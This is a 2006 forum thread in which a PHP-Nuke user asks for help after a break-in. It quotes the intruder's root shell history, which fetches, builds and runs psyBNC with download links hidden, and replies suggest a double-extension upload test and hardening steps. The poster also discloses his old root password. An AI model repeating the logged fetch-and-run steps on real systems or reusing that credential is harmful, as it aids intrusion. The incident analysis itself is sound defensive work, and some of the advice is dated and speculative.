My home server was hacked and I cant found the way used for hack it.
I inspect the root's .bash_history and found this ones:
Quote:
id
[uname -a
uname -a
passwd root
uptime
/sbin/ifconfig
uname -a
cd /tmp
wget
Only registered users can see links on this board! Get registered or login to the forums!
lynx -source
Only registered users can see links on this board! Get registered or login to the forums!
>
psyBNC2.3.2-4.tar.tar
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
ls
make
makefile
./psybnc
chmod 777 psybnc
cd psybnc[
cd psybnc
cd /tmp
ls
cd psybnc
make;pico psybnc.conf;./psybnc
./psybnc
ls
cd /tmp
ls
rm -vr psyBNC2.3.2-4.tar.tar
rm -vr psybnc
ls
wget
Only registered users can see links on this board! Get registered or login to the forums!
lynx -source
Only registered users can see links on this board! Get registered or login to the forums!
> psybnc.tgz
tar -zxvf psybnc.tgz
cd psybnc
ls
make
pico psybnc.conf
vi psybnc.conf
./psybnc
/sbin/ifconfig
cd /tmp;wget
Only registered users can see links on this board! Get registered or login to the forums!
lynx -source
Only registered users can see links on this board! Get registered or login to the forums!
>
psyBNC2.3.2-4.tar.gz
ls
rm -vr psyBNC2.3.2-4.tar.gz
rm -vr psybnc
ls
rm -vr psybnc.tgz
killall -9 psybnc
ls
ps -aux
killall -9 psybnc
cd /va/tmp
cd /tmp
cd /var/tmp
lynx -source
Only registered users can see links on this board! Get registered or login to the forums!
>
psyBNC2.3.2-4.tar.gz
/sbin/ifconfig
id
cd /tmp
lynx -source
Only registered users can see links on this board! Get registered or login to the forums!
> psybnc.tar.tar
tar -zxvf psybnc.tar.tar
cd ...
./run "dev" ./uptime
uname -a
/sbin/ifconfig
ps -aux
killall -9 bindz
killall -9 r0nin
Any one could help me to find the vulnerability???
I use phpnuke 7.4 and my server is a debian stable.
I have the log files in the /var/log and i see that the file psyBNC2.3.2-4.tar.gz was created in may, 1.
Joined: Aug 29, 2004 Posts: 9059 Location: Arizona
Posted:
Thu Jun 01, 2006 7:14 am
Doubtful this was hacked because of PHP-Nuke unless you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server. This guy somehow got your root password? You have to find out how he/she got user level access to the server (or was it root access?).
If you do not have to access your server remotely (i.e., you have a keyboard and monitor connected up directly), then you may want to disable remote user login. Don't know how to do that, but I know it is possible in most *nix environments.
I have servers, here at the house -- Slackware boxes -- but none of them have PHP-Nuke installed. And, the other day, I noticed hackers from India had been trying to get into them for the last three weeks. Hahaha! "I pity dah foos!" as Mister-T used to say...
Anyway, this sort of stuff just goes with the turf. I don't recognize a familiar pattern in what was submitted above...
Some of you might find this interesting! I posted it the other day on another web site...
==============================
To see if 'your' server is vulnerable to this (ahem) unspecified attack, try the following...
Create a plain text file containing the following code:
Code:
<?php print 'Oops! If you can read this, your web server is vulnerable to attack!'; ?>
Save and rename it to vindsl.php.rar, then upload it somewhere on 'your' server.
Then, run it in your browser by entering the URL in the browser's addy bar, i.e.
Only registered users can see links on this board! Get registered or login to the forums!
If the page shows the message:
Quote:
Oops! If you can read this, your web server is vulnerable to attack!
...you should be alarmed!
If it returns garbled text, or just asks you to download the file, then 'your' web server is probably configured okay and you're not vulnerable. Otherwise, use the fix above...
kguske: yes, this is a needle in a very large haystack, for me!
montego:
Quote:
you used the same userid's and/or passwords in Nuke that you were using to actually log in to the server
yes! I have a general user in my server with the same username and pass that I was using in Nuke.
Quote:
This guy somehow got your root password?
Yes, the guy got my root password. My root pass was a very um commom pass. It was: DP83905AVQB . I suppose that he did a reverse conexion with a irq script and gain access to a apache shell script and do the comand "passwd" and change the root passwd. For me, he dont discovered my root passwd.
Quote:
If you do not have to access your server remotely (...), then you may want to disable remote user login
Yes, I have a keyboard and monitor and mouse connected. But, my server was in another place, then I need to connect to it by SSH. But, how I write above, I suppose that the guy did a reverse connection!!!! This is the problem: how I block reverse conection and how I block access to apche shell???
VinDSL
Quote:
I'd disable wget and lynx!!!
Yes, I will deinstall this two applications.
Quote:
Then, away they went...
Yes, I am sure that he went!
Quote:
Make sure your server is recognizing the MIMEs mentioned above, such as:
I am sorry, but what you are suggesting me?? Where I find/modify here? In http.conf? I am sorry, but my english is very poor!!!
I am very interested, to prevent and to learn, how the guy gain access to my shell???
I suppose that it upload the rootkit to a dir with write permission in the My eGallery module!!! Then, I will like to discovery it or confirme it or not...
Joined: Aug 29, 2004 Posts: 9059 Location: Arizona
Posted:
Fri Jun 02, 2006 6:22 am
Quote:
I suppose that it upload the rootkit to a dir with write permission in the My eGallery module!!! Then, I will like to discovery it or confirme it or not...
The only way to confirm this, I think, is through your Apache logs.
I am glad VinDSL is in on this discussion because he is WAY more knowledgeable about this stuff than I.
I tried you test of vindsl.php.rar and sad to say it failed. So I added the mime types in my .htaccess file but it did not do anything. I checked on the apache site and could not find anything else to do, is there some trick?
Joined: May 18, 2005 Posts: 119 Location: SVCDPlaza
Posted:
Fri Jun 09, 2006 4:08 am
On suse you can put the mime_magic module @ the APACHE_MODULES in the file:/etc/sysconfig/apache2 .
The MIME type goes in the file:/etc/mime.types file
Reboot apache and it will work .
Joined: Aug 29, 2004 Posts: 9059 Location: Arizona
Posted:
Fri Jun 09, 2006 6:24 am
marcelolaia, without knowing My_eGallery, I am not certain of the best way. My initial reaction was to add the following check towards the top of each of the My_eGallery scripts:
Code:
if ( !defined('MODULE_FILE') )
{
die("You can't access this file directly...");
}
This would prevent these direct access attempts, however, I am not 100% if this would cause issues with the operations of the tool. It they wrote it to work within the nuke "structure", meaning, everything comes in through modules.php or admin.php.
Another possible "killer" to this if, again, it was written specifically for nuke and NO direct calls are made under this structure outside modules.php and admin.php, then you could even place a password on the My_eGallery module directory through your host control panel or use CGI Auth on it.
Unfortunately, although nuke has had many wholes which have needed patching over the years, it is only as weak as its weakest link, and if you throw in a module that has "wholes" then immediately, your whole nuke site is vulnerable.
I have not heard about as many issues with Menalto's Gallery, and they are still a very active bunch, so you might want to try using that instead. If you do decide to switch, be sure to get rid of the old module that is not secure!
View next topic View previous topic
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
"
